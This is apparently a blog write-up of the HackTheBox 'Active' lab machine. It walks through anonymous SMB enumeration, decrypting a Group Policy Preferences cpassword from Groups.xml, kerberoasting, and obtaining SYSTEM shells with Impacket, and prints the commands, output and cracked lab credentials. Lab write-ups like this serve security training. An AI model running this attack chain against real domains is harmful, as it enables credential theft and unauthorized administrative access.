HackTheBox Active Writeup

6 min readDec 5, 2022

Active Walkthrough

Active is an easy rated windows machine on hackthebox by eks and mrb3n. Groups.xml was found on a smb mount containing the encrypted credentials for a account of which the decrypting keys were public. So, the cipher was decrypted and the password was valid for the account. Administrator account was kerberoastable whose hash was cracked to get root on the machine.

Nmap

Initial Scan

# Nmap 7.80 scan initiated Sun Jul 4 09:48:35 2022 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.100
Increasing send delay for 10.10.10.100 from 0 to 5 due to 258 out of 858 dropped probes since last increase.
Nmap scan report for 10.10.10.100
Host is up (0.096s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022–07–04 04:03:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022–07–04T04:04:50
|_ start_date: 2022–07–03T18:25:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 4 09:51:56 2022–1 IP address (1 host up) scanned in 201.76 seconds

We can see a lot of ports open.
Since, dns(53), kerberos(88) and ldap(389) is open, we can assume that the machine might be a active directory domain controller.
We also get a domain name : active.htb, which we will add to our hosts file.

Checking SMB on Port 445

is anonymous login enabled?

reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N -L 10.10.10.100
Anonymous login successful
Sharename Type Comment
— — — — — — — — — — -
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled — no workgroup available

It is enabled and we can see the shares.
Among all of the shares, Replication is not a default one. So let us check if we have a read permission on that share.

Checking if Replication share is readable

reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N //active.htb/Replication
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \>

We get a smb shell.

Listing the contents of Replication share

smb: \> dir
. D 0 Sat Jul 21 16:22:44 2018
.. D 0 Sat Jul 21 16:22:44 2018
active.htb D 0 Sat Jul 21 16:22:44 2018
10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\> dir
. D 0 Sat Jul 21 16:22:44 2018
.. D 0 Sat Jul 21 16:22:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:22:44 2018
Policies D 0 Sat Jul 21 16:22:44 2018
scripts D 0 Thu Jul 19 00:33:57 2018
10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\>

Listing the file contents recursively

smb: \active.htb\> recurse ON
smb: \active.htb\> dir

First I turn on the recurse option, and if i do dir, it will list all the files and folder recursively.

Among all of the files, Groups.xml looks interesting.

Reading this article, I found that this file contains the password for the local users which is used to replicate across the different devices on the domain and is encrypted using AES. Also the key for decryption was made public by the microsoft which means we can easily decrypt the hash and get the password.

Downloading and reading the content

smb: \> get \active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
getting file \active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
<?xml version=”1.0" encoding=”utf-8"?>
<Groups clsid=”{3125E937-EB16–4b4c-9934–544FC6D24D26}”><User clsid=”{DF5F1855–51E5–4d24–8B1A-D9BDE98BA1D1}” name=”active.htb\SVC_TGS” image=”2" changed=”2018–07–18 20:46:06" uid=”{EF57DA28–5F69–4530-A59E-AAB58578219D}”><Properties action=”U” newName=”” fullName=”” description=”” cpassword=”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ” changeLogon=”0" noChange=”1" neverExpires=”1" acctDisabled=”0" userName=”active.htb\SVC_TGS”/></User>
</Groups>

We get a username and a hash.
SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Decrypting the hash

To decrypt we need encryption key and an IV.

From this repo, I got the key, IV and the mode of AES encryption.

Using cyberchef to decrypt the hash

We get the password for the svc_tgs.

Checking if the creds are valid

reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u user -p pass
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

We have valid creds.

Listing the shares

Doesn't look like we can do much with it. We can read few default shares and the Replication share.

Checking if there are any kerberoastable users

Those accounts which have their Service Principal Name(SPN) set are kerberoastable. Usually these accounts are service accounts.
For kerberoastable account, we can request a TGS and some portion of data inside this TGS is encrypted with the NTLM hash of the service account which we can try and crack offline.
To request for TGS, we must have a valid account on the domain.

Since we have a valid account on the domain, we can request for the TGS, if there are any accounts associated with the services.

We do have a account and we get the hash back.

Trying to crack the hash using hashcat

And we can see that the hash cracks successfully.

Testing the account with cme

reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

It says pwned so it means that we can get a shell.
we can use wmiexec or smbexec to get a shell.
The difference is that we get a shell as administrator with smbexec whereas nt authority\system as wmiexec.

Getting a shell as system

reddevil@ubuntu:~/Documents/htb/retired/active$ smbexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 — Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell — Careful what you execute
C:\Windows\system32>whoami
nt authority\system

Shell as administrator

reddevil@ubuntu:~/Documents/htb/retired/active$ wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 — Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell — Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator